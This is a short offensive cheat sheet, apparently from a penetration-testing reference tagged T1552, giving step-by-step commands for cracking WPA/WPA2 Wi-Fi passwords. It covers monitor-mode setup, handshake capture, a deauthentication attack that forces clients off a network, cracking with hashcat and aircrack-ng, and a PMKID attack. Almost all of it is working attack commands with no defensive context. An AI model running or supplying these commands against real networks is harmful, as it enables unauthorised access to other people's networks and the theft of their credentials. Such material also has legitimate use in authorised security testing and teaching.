High Severity | T1552
📶 WPA/WPA2 Cracking
🤝 Handshake Capture
# Put interface in monitor mode
airmon-ng start wlan0
iwconfig wlan0mon mode monitor

# Scan for targets
airodump-ng wlan0mon

# Capture handshake
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth attack to force reconnection
aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA wlan0mon
🔓 Cracking
# Convert to hccapx for hashcat
hcxpcaptool -o output.hccapx input.pcap

# Crack with hashcat
hashcat -m 2500 output.hccapx wordlist.txt

# Or use aircrack
aircrack-ng -w wordlist.txt capture-01.cap

# GPU optimization
hashcat -m 2500 -d 1 output.hccapx wordlist.txt

# Rules-based cracking
hashcat -m 2500 output.hccapx wordlist.txt -r rules/best64.rule
💡 PMKID Attack (No Handshake)
# Capture PMKID
hcxdumptool -i wlan0mon -o output.pcap --filterlist=targets.txt --enable_status

# Convert (-z writes the PMKID hash file for mode 16800; -o writes hccapx)
hcxpcaptool -z hashes.txt output.pcap

# Crack
hashcat -m 16800 hashes.txt wordlist.txt